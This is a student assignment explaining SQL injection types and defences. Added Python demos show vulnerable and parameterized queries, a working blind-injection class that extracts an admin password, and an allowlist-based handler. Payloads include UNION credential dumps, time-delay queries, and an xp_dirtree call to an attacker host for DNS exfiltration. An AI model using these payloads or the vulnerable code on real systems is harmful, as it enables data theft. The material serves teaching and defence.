Applied Exploit and Hacking 5

The document provides an overview of SQL Injection (SQLi), a security vulnerability in web applications where attackers manipulate database queries through malicious SQL code. It details various types of SQLi, including Classic, Blind, and Out-of-Band SQL Injection, along with methods of prevention such as parameterized queries, input validation, and the use of web application firewalls. The document emphasizes the importance of securing applications against these attacks to protect sensitive data and maintain system integrity.


Lahore Garrison University

Name: Aftab Hussain
Roll no: Fa-21/Bs DFCS/033
Submitted by: Aftab Hussain
Submitted to: Saud Bin Farooq
Assignment: Applied Exploits and Hacking

Assignment: 02
What is SQL Injection (SQLi)?
SQL Injection is a security flaw in web applications where attackers
manipulate database queries by injecting malicious SQL code through user
input. It occurs when user-controlled data is concatenated into the query
string and therefore parsed as part of the SQL statement instead of being
bound as a value. Successful SQL injection attacks can enable an attacker
to:

• Access sensitive information
• Alter or delete data in the database
• Perform administrative tasks on the database
• Bypass authentication mechanisms
• In extreme cases, take full control of the underlying system (if the
  database exposes a way to run operating-system commands or write files
  to disk)

Types of SQL Injection

1. Classic (In-Band) SQL Injection


Description:
This is the most common form of SQLi. The attacker uses the same
communication path to deliver the attack and retrieve the results.

Variants:

• Error-Based SQLi
Method: Exploits error messages returned by the database to extract
information: the payload deliberately makes a query fail (for example by
forcing a type conversion of a selected value) so that the verbose error
text carries the data.
Example Payload: ' OR 1=1 --
Injected into:
SELECT * FROM users WHERE username = '$input';
Resulting query:
SELECT * FROM users WHERE username = '' OR 1=1 --';
Effect: This particular payload is a tautology, the simplest in-band case:
the WHERE condition is always true, so every user is returned and a login
check built on this query is bypassed. When the application echoes
database errors, malformed payloads also reveal table and column names.

• Union-Based SQLi
Method: Uses the UNION SQL operator to append the rows of a second,
attacker-chosen query to the response of the original query.
Example Payload: ' UNION SELECT username, password FROM admin_table --
Injected into:
SELECT name, email FROM customers WHERE id = '$id';
Effect: Discloses data from other tables, such as administrator
credentials, in the same page that normally lists customers. The injected
SELECT must return the same number of columns as the original query (two
here) with compatible types; attackers find the column count first with
probes such as ' ORDER BY 3 -- or ' UNION SELECT NULL, NULL --.
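The two in-band payloads above, run against a small SQLite database from Python, as an added example that is not part of the assignment. The tables, rows and function names are constructed for the demonstration. The vulnerable functions splice the input into the query text exactly as the examples above do; the safe versions send the same query with a `?` placeholder so the database driver binds the input as a value.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not from the assignment).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
        CREATE TABLE customers(id INTEGER, name TEXT, email TEXT);
        INSERT INTO customers VALUES (1, 'Acme', 'acme@example.com');
    """)
    return db

# --- Vulnerable: user input is spliced into the SQL text -------------------

def find_user_vulnerable(db, username):
    sql = f"SELECT id, username FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchall()

def find_customer_vulnerable(db, customer_id):
    sql = f"SELECT name, email FROM customers WHERE id = '{customer_id}'"
    return db.execute(sql).fetchall()

# --- Hardened: the same queries with bound parameters ----------------------

def find_user_safe(db, username):
    # The driver sends the SQL and the value separately; the value is never parsed as SQL.
    return db.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    ).fetchall()

def find_customer_safe(db, customer_id):
    return db.execute(
        "SELECT name, email FROM customers WHERE id = ?", (customer_id,)
    ).fetchall()

# The two payloads from the text. The comment marker swallows the closing quote.
TAUTOLOGY = "' OR 1=1 --"
UNION = "' UNION SELECT username, password FROM users --"

def demo():
    db = make_db()
    return {
        "tautology_vulnerable": find_user_vulnerable(db, TAUTOLOGY),   # every user
        "tautology_safe": find_user_safe(db, TAUTOLOGY),               # no such username
        "union_vulnerable": find_customer_vulnerable(db, UNION),       # credentials, not customers
        "union_safe": find_customer_safe(db, UNION),                   # no such id
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:22s} {rows}")
```

The UNION payload works only because it returns two columns, matching `name, email`; with a different column count SQLite (like every other engine) rejects the compound query, which is why attackers probe the column count first.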

2. Blind SQL Injection


Description:
Occurs when the application doesn’t display error messages, but attackers
can infer the result of queries based on changes in application behavior.

Variants:

• Boolean-Based (Content-Based) Blind SQLi

Method: Injects conditions that evaluate as true or false and observes
how the application responds.
Examples:
' AND 1=1 -- (True)
' AND 1=2 -- (False)
Effect: Different page responses help deduce if injected statements are
true or false. By asking one yes/no question per request (for example
whether a given character of a value is greater than some letter), an
attacker extracts data one bit at a time. In MySQL the -- comment must be
followed by a space; # is an alternative.

• Time-Based Blind SQLi

Method: Uses database time-delay functions to determine if a condition
is true when the page content itself does not change.
Examples (the delay and metadata functions differ per database engine):
MySQL:
' AND IF(SUBSTRING(DATABASE(),1,1) = 'a', SLEEP(5), 0) -- -
Microsoft SQL Server:
'; IF (SUBSTRING(DB_NAME(),1,1) = 'a') WAITFOR DELAY '00:00:05' --
Effect: If the server delays the response by about five seconds, the
condition was true, allowing attackers to extract data over time.
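The boolean-based extraction loop described above, written out as an added example (not part of the assignment) against a constructed SQLite table. `page_shows_item` stands in for a vulnerable endpoint that splices a numeric id into its query and reveals only whether an item was rendered. The extractor never sees a query result; it recovers the admin password by binary-searching first the length and then each character's code point, the same way time-based extraction would work with a delay as the signal.

```python
import sqlite3

# Constructed target (not from the assignment): one table holding the value to recover.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'Tr0ub4dor');
    """)
    return db

def page_shows_item(db, item_id):
    # Stand-in for the vulnerable endpoint: the id is spliced into the query unquoted,
    # and the only thing the caller learns is whether the page rendered an item.
    sql = f"SELECT id FROM users WHERE id = {item_id}"
    return db.execute(sql).fetchone() is not None

# Subquery for the value being extracted (hypothetical target).
SECRET = "(SELECT password FROM users WHERE username = 'admin')"

class BlindExtractor:
    def __init__(self, db):
        self.db = db
        self.queries = 0  # number of requests the extraction needed

    def ask(self, condition):
        # One boolean question: item 1 is shown only when the injected condition holds.
        self.queries += 1
        return page_shows_item(self.db, f"1 AND ({condition})")

    def search(self, expr, lo, hi):
        # Binary search for the integer value of expr in [lo, hi] using "expr > mid" questions.
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, subquery=SECRET, max_len=64):
        length = self.search(f"LENGTH({subquery})", 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            # Printable ASCII range. MySQL and SQL Server use ASCII() where SQLite has UNICODE().
            code = self.search(f"UNICODE(SUBSTR({subquery}, {pos}, 1))", 32, 127)
            chars.append(chr(code))
        return "".join(chars)

if __name__ == "__main__":
    ex = BlindExtractor(make_db())
    print(ex.extract(), "recovered in", ex.queries, "requests")
```

Binary search is what makes blind injection practical: about seven requests per character instead of up to 95 with a linear scan, which is also why rate-based detection on these endpoints should look for bursts of near-identical requests differing only in a numeric literal.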

3. Out-of-Band SQL Injection


Description:
Used when the attacker cannot see query results or timing differences in
the application's own response. It extracts data through alternate
channels such as DNS or HTTP requests made by the database server itself.
Example (Microsoft SQL Server):
'; EXEC xp_dirtree '\\attacker.com\share' --
Effect: Forces the database server to resolve and connect to a UNC path on
a host controlled by the attacker, so the DNS lookup (and SMB connection
attempt) arrives at the attacker's server; data is exfiltrated by building
it into the requested hostname. This channel only exists if the database
host is allowed outbound DNS and network traffic, so egress filtering on
database servers is a direct mitigation.

How to Prevent SQL Injection


1. Parameterized Queries (Prepared Statements):
Use query placeholders instead of directly embedding user input. The SQL
text and the values reach the database separately, so the input is
treated as data, not executable code. This is the primary defence; the
measures below are defence in depth.
Example (PHP with PDO):

$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");

$stmt->execute([$username]);

Placeholders bind values only. Table and column names and keywords such
as an ORDER BY direction cannot be parameterized and must be checked
against an allowlist instead.

2. Stored Procedures:
Encapsulate SQL logic in predefined routines on the database. Properly
implemented, they limit SQLi exposure; a procedure that builds a query
string from its arguments and runs it with EXEC or sp_executesql is just
as injectable as application code.

3. Input Validation and Whitelisting:


Always validate input. Accept only known, expected values (e.g., numeric
IDs) and reject or sanitize anything else.

4. Use ORM Frameworks:


Frameworks like Hibernate (Java), SQLAlchemy (Python), and Entity
Framework (.NET) abstract SQL away and parameterize queries by default,
reducing direct exposure to injection risks. Every ORM also offers a
raw-query or query-string API, and string concatenation there is
injectable just like plain SQL.

5. Principle of Least Privilege:


Application database users should only have permissions they need (for
example read-only access for a search endpoint), and should never be
root/admin accounts. This limits what an injection can reach: a
read-only account cannot modify data or call procedures that touch the
file system or run OS commands.

6. Web Application Firewalls (WAFs):


Deploy a WAF to inspect and block malicious traffic, including known SQLi
attack patterns. Treat it as a compensating control that raises the
attacker's cost and buys time to fix the code, not as a fix: signature
filters are routinely bypassed with encoding and syntax variants.

7. Error Message Handling:


Avoid showing detailed database errors to end users. Use generic
messages while logging technical details internally.

8. Regular Security Testing:


Perform frequent penetration testing and code audits. Use tools like:

o sqlmap: For automated SQL injection detection and exploitation

o Burp Suite: For both manual and automated vulnerability testing
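Points 1, 3 and 7 above combined in one request handler, as an added example (not part of the assignment) in Python over a constructed SQLite table. Values are bound with placeholders; the customer id is validated as a positive integer before it is used; the sort column and direction, which placeholders cannot bind, come from fixed allowlists; and database errors are logged in full but reported to the caller only as a generic message. The table, rows and function names are constructed for the demonstration.

```python
import logging
import sqlite3

log = logging.getLogger("customers")

# Identifiers and keywords cannot be bound as parameters, so they come from allowlists.
SORT_COLUMNS = {"id", "name", "email"}
SORT_DIRECTIONS = {"ASC", "DESC"}

def make_db():
    # Constructed sample data (not from the assignment).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE customers(id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        INSERT INTO customers VALUES (1, 'Acme', 'acme@example.com'),
                                     (2, 'Globex', 'info@globex.example'),
                                     (3, 'Initech', 'hr@initech.example');
    """)
    return db

def parse_customer_id(raw):
    # Input validation: a customer id is a string of digits, nothing else.
    if not raw.isdigit():
        raise ValueError("customer id must be a positive integer")
    return int(raw)

def get_customer(db, raw_id):
    cid = parse_customer_id(raw_id)
    return db.execute("SELECT name, email FROM customers WHERE id = ?", (cid,)).fetchone()

def search_customers(db, needle, sort_by="name", direction="asc"):
    # Only allowlisted identifiers are ever interpolated into the SQL text.
    if sort_by not in SORT_COLUMNS or direction.upper() not in SORT_DIRECTIONS:
        raise ValueError("unsupported sort option")
    # The search value is bound; LIKE metacharacters in it are escaped so a user
    # cannot turn a search for "50%" into a wildcard that matches every row.
    escaped = needle.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = (f"SELECT name, email FROM customers WHERE name LIKE ? ESCAPE '\\' "
           f"ORDER BY {sort_by} {direction.upper()}")
    return db.execute(sql, (f"%{escaped}%",)).fetchall()

def handle_request(db, raw_id):
    # Error handling: a generic message goes to the client, details go to the log only.
    try:
        row = get_customer(db, raw_id)
    except ValueError:
        return {"status": 400, "error": "invalid request"}
    except sqlite3.Error as exc:
        log.error("database error for id=%r: %s", raw_id, exc)
        return {"status": 500, "error": "internal error"}
    if row is None:
        return {"status": 404, "error": "not found"}
    return {"status": 200, "name": row[0], "email": row[1]}

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "2"))
    print(handle_request(db, "1' OR 1=1 --"))
    print(search_customers(db, "e", "id", "desc"))
```

The allowlist check is the part most often missing in real code: a sort parameter passed straight into `ORDER BY` cannot be parameterized and is a classic blind-injection entry point even when every value in the query is bound correctly.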
